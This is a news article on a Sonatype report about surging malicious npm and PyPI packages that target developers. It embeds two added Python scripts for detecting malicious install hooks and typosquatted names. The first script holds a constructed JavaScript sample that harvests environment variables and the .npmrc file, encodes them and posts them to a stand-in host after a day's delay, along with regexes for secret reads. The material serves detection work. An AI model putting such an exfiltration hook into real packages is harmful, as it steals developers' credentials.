Open-source malware surges 188 percent, targeting developers

Sonatype discovered 16,279 malicious open-source packages in Q2 2025, marking a 188 percent increase from the previous year. Data exfiltration continues to dominate attacker tactics, with sophisticated campaigns targeting developers and their credentials.

Developers possess what attackers truly value: access to secrets and keys stored in predictable locations. Environment variables, config files, and CI/CD tools contain sensitive information that can provide unauthorized access to cloud accounts, APIs, databases, and internal systems.

The crypto-encrypt-ts package exemplifies this targeting strategy, a recent Sonatype report reveals. Masquerading as a legitimate CryptoJS library revival, it gained nearly 2,000 downloads before being identified as malware. Once installed, it selectively targeted crypto wallets with balances exceeding 1,000 units while harvesting MongoDB connection strings and environment variables.

This targeted approach reflects a sophisticated understanding of developer workflows and the value of the data they handle. Unlike traditional phishing campaigns targeting administrative employees, these attacks focus on the technical personnel who maintain direct access to production systems.

Developer environments under siege

The second quarter of 2025 revealed a troubling acceleration in supply chain attacks against the software development ecosystem. Malicious actors are systematically targeting developer environments, with 55 percent of all detected packages designed specifically for data exfiltration.

Over 4,400 packages were engineered to steal secrets, personally identifiable information, credentials, and API tokens from unsuspecting developers. The attackers are leveraging time-delayed payloads and encrypted transmissions to avoid detection, making these threats particularly dangerous for CI/CD pipelines.

The pattern is not new. Earlier incidents include malicious packages spread on PyPI that successfully infiltrated developer systems, and .NET developers were targeted in 2023. What makes the current attacks more concerning, however, is their scale and persistence; recent campaigns delivered through IDE extensions, for example, show how far the attack surface that developers face has expanded.
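The harvest-then-send pattern the report describes (an install hook that reads environment variables and config files, waits, then posts them out) can be triaged statically before a package is allowed into a build. The following Python script is an added example, not code from the article or from Sonatype: it reads an npm package.json, follows any lifecycle hook to the local script it runs, and scores the combination of secret reads, outbound sends and long setTimeout delays. The manifest and the setup.js contents are constructed for the example and do not describe any real package.

```python
import json
import math
import re

# Constructed package.json for a hypothetical package; not a real package.
MANIFEST = json.dumps({
    "name": "example-helper",
    "version": "1.0.3",
    "scripts": {"postinstall": "node setup.js", "test": "jest"},
})

# Constructed contents of the file the postinstall hook runs. It mirrors
# the pattern the article describes: wait, harvest env/config, send out.
FILES = {
    "setup.js": """
const https = require('https');
const fs = require('fs');
setTimeout(() => {
  const env = JSON.stringify(process.env);
  const cfg = fs.readFileSync(process.env.HOME + '/.npmrc', 'utf8');
  const body = Buffer.from(env + cfg).toString('base64');
  https.request({ host: 'example.invalid', method: 'POST' }).end(body);
}, 1000 * 60 * 60 * 24);
""",
}

# npm lifecycle scripts that run automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Each regex matches one building block of the harvest-then-send pattern.
# None alone proves malice; the combination is what the triage scores.
READ_INDICATORS = [
    ("reads-env", re.compile(r"process\.env")),
    ("reads-secret-file", re.compile(r"['\"/]\.(npmrc|env|aws/credentials)\b")),
    ("mongo-uri", re.compile(r"mongodb(\+srv)?://")),
]
SEND_INDICATORS = [
    ("network-send", re.compile(r"https?\.request\(|fetch\(|net\.connect\(")),
    ("encodes-payload", re.compile(r"toString\('base64'\)|btoa\(")),
]
# setTimeout(..., <delay>) where the delay is an integer or a product of integers.
DELAY_RE = re.compile(r"setTimeout\(.*?\}\s*,\s*([0-9][0-9\s*]*)\)", re.S)


def max_delay_ms(source):
    """Largest setTimeout delay in ms (integer literals and products only)."""
    best = 0
    for expr in DELAY_RE.findall(source):
        best = max(best, math.prod(int(t) for t in expr.split("*")))
    return best


def triage(manifest_json, files):
    """Return (findings, risk) for a manifest plus its local script sources."""
    scripts = json.loads(manifest_json).get("scripts", {})
    findings = []
    reads = sends = hooks = 0
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        hooks += 1
        findings.append(f"lifecycle-hook:{hook}:{cmd}")
        # Inspect every local .js file the hook command names.
        for fname in re.findall(r"[\w./-]+\.js\b", cmd):
            src = files.get(fname.lstrip("./"), "")
            for label, rx in READ_INDICATORS:
                if rx.search(src):
                    reads += 1
                    findings.append(f"{fname}:{label}")
            for label, rx in SEND_INDICATORS:
                if rx.search(src):
                    sends += 1
                    findings.append(f"{fname}:{label}")
            delay = max_delay_ms(src)
            if delay >= 60_000:  # a minute or more outlives most install-time sandboxes
                findings.append(f"{fname}:delayed-exec:{delay}ms")
    if hooks and reads and sends:
        risk = "high"      # install hook + secret read + outbound send
    elif hooks and (reads or sends):
        risk = "medium"
    elif hooks:
        risk = "low"       # a hook alone is common in legitimate packages
    else:
        risk = "none"
    return findings, risk


if __name__ == "__main__":
    found, risk = triage(MANIFEST, FILES)
    print(risk)
    for f in found:
        print(" ", f)
```

The scoring deliberately treats a lifecycle hook by itself as low risk, because many legitimate native packages use one; it is the hook combined with a read of secrets and an outbound send, and especially a delay measured in hours, that matches the campaigns the report describes. Run it as a pre-merge check on the unpacked tarball rather than on the registry metadata alone, since the script file is where the behaviour lives.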

Shifting threat landscape

The data reveals significant changes in attacker preferences. Crypto miners declined to just 5 percent of malicious packages as attackers pivot toward more profitable and persistent attack vectors. Data corruption malware doubled in frequency, representing 3 percent of total packages.

This shift suggests attackers are moving beyond simple resource theft toward more damaging activities. The trend toward data exfiltration and corruption indicates a maturation of supply chain attacks, with threat actors developing more sophisticated techniques to monetize their access.

Nation-state actors join the fray

The Lazarus Group, linked to the North Korean government, accounted for 107 malicious packages with over 30,000 downloads. These packages used deceptive names like “http-parse” and “vite-meta-plugin” to mimic legitimate development tools.

Separately, the Yeshen-Asia campaign deployed over 60 malicious npm packages through dozens of unique accounts, all traced back to common infrastructure. The attackers maintained persistence through systematic account creation and package publication, demonstrating the organized nature of these threats.
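Both campaigns above rely on names that read like tools a developer already trusts. One defensive check is to compare every name in a lockfile against the packages a project is known to depend on and flag near-misses before they are installed. The script below is an added example written for this article, not tooling from Sonatype or from npm: it parses a package-lock.json, normalises separators and case, strips scopes, and reports names within a small edit distance of an allowlisted package. The allowlist, the lockfile and the package names it contains are all constructed for the example.

```python
import json

# Constructed allowlist: the packages this hypothetical project expects.
KNOWN_PACKAGES = {"express", "lodash", "vite", "react", "http-parser-js"}

# Constructed package-lock.json fragment in the lockfileVersion 3 layout.
# "lodahs", "expres" and "@scope/lodash" are made-up near-miss names.
LOCKFILE = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app"},
        "node_modules/express": {"version": "4.19.2"},
        "node_modules/lodahs": {"version": "4.17.21"},
        "node_modules/expres": {"version": "4.19.2"},
        "node_modules/react": {"version": "18.3.1"},
        "node_modules/@scope/lodash": {"version": "1.0.0"},
        "node_modules/@types/node": {"version": "20.14.2"},
    },
})


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize(name):
    """Collapse separators and case so 'Lo_dash' and 'lo-dash' compare equal."""
    return name.lower().replace("_", "").replace("-", "").replace(".", "")


def unscoped(name):
    """'@scope/pkg' -> 'pkg'; plain names are returned unchanged."""
    return name.rsplit("/", 1)[-1] if name.startswith("@") else name


def lockfile_names(lockfile_json):
    """Collect installed package names from the lockfile's 'packages' map."""
    pkgs = json.loads(lockfile_json).get("packages", {})
    return {p.rsplit("node_modules/", 1)[-1] for p in pkgs if "node_modules/" in p}


def suspicious_names(names, known, max_distance=2):
    """Return {name: reason} for names that look like near-misses of known ones."""
    norm_known = {normalize(k): k for k in known}
    flagged = {}
    for name in sorted(names):
        if name in known:
            continue
        base = unscoped(name)
        if base in known:
            flagged[name] = f"scoped name shadows known package '{base}'"
            continue
        nb = normalize(base)
        if nb in norm_known:
            flagged[name] = f"separator/case variant of '{norm_known[nb]}'"
            continue
        for nk, orig in norm_known.items():
            d = levenshtein(nb, nk)
            if 0 < d <= max_distance:
                flagged[name] = f"edit distance {d} from '{orig}'"
                break
    return flagged


if __name__ == "__main__":
    for pkg, why in suspicious_names(lockfile_names(LOCKFILE), KNOWN_PACKAGES).items():
        print(f"{pkg}: {why}")
```

An edit-distance check catches transpositions and dropped letters but not a plausible-sounding new name, which is why it belongs alongside the install-script review and publisher checks rather than replacing them; a short allowlist also keeps short names such as "vite" from generating noise.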

Protection remains challenging

Traditional antivirus solutions often fail to detect these sophisticated threats, leaving organizations vulnerable despite standard security measures. The packages frequently use legitimate certificates and mimic established projects, making detection particularly difficult.

The 188 percent increase in malicious packages represents more than just statistical growth: it signals a fundamental shift in how attackers approach software supply chains. As open-source adoption continues expanding, the attack surface grows correspondingly larger.

Organizations must implement comprehensive monitoring systems that can identify suspicious package behavior beyond simple signature-based detection. The complexity of modern development environments demands security solutions that understand the nuanced ways malicious code can infiltrate and persist within software projects. The escalation in open-source malware attacks underscores the critical importance of treating software supply chain security as a fundamental business risk rather than a technical afterthought. We fear this level of understanding, as promoted by Sonatype, will still take a long time to bed in.